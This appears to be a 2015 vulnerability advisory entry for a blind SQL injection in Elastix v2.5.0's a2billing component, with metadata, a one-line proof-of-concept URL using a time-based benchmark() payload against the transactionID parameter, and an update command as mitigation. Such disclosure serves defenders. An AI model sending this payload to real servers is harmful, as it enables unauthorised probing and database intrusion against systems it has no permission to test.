vendor:
Elastix
by:
Ahmed Aboul-Ela
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Elastix
Affected Version From: v2.5.0
Affected Version To: v2.5.0
Patch Exists: YES
Related CWE: N/A
CPE: elastix-a2billing
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015
Elastix v2.x Blind SQL Injection Vulnerability
The GET parameter transactionID was used directly in the SQL query without any sanitization which lead directly to SQL Injection vulnerability. Proof of Concept: http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1)) The backend response will delay for few seconds, which means the benchmark() function was executed successfully.
Mitigation:
The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now [~] yum update elastix-a2billing